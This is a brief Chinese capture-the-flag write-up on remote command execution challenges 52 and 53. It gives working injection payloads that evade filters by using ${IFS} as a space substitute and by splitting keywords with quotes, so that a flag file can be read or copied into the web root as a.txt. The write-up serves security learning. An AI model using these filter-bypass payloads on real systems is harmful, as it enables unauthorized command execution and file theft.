远程命令执行第三天
目录
- 52
- 53
52
大于号小于号也被过滤但是$符号给放出来了所以可以使用linux的内置环境变量 ${IFS} IFS存储的内部字段分隔符,默认是空格或者制表符。所以可以用这个代替nl命令中的<符号。
经过测试发现网站目录下的flag是假的真的在root根目录
payload=?c=nl${IFS}/fla?||
也可以用拷贝的方式,将新文件命名为txt文件,这样就不会解析了。
?c=cp$IFS/fla?$IFS/var/www/html/a.txt||ls
然后访问网站目录下的a.txt即可获得flag
如果$IFS 不能使用可以考虑 ${IFS}
53
ca’‘t${IFS}fla’'g.php